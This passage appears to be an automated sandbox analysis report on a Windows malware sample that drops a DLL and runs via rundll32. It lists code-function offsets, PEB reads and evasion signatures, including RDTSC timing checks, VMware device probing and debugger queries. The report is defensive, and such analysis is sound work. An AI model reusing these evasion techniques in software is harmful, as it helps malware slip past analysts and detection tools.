          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_1_0041B45C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_0465D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BB925A push esp; retf
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBB3A5 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBB3FB push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBB3F2 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBC8CC push es; ret
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 6_2_02BBB45C push eax; ret
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | File created: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000002BA85E4 second address: 0000000002BA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe | RDTSC instruction interceptor: First address: 0000000002BA896E second address: 0000000002BA8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6540 | Thread sleep time: -70000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_004026BC FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000004.00000000.228623277.00000000056A1000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.233670194.0000000008907000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.233210221.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.492571726.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.233384831.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.233471521.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.228573395.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.232958897.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_02631868 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 0_2_02631650 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ABB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ACEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00ABD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00A86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NdBLyH2h5d.exe | Code function: 1_2_00AC1C06 mov eax, dword ptr fs:[00000030h]
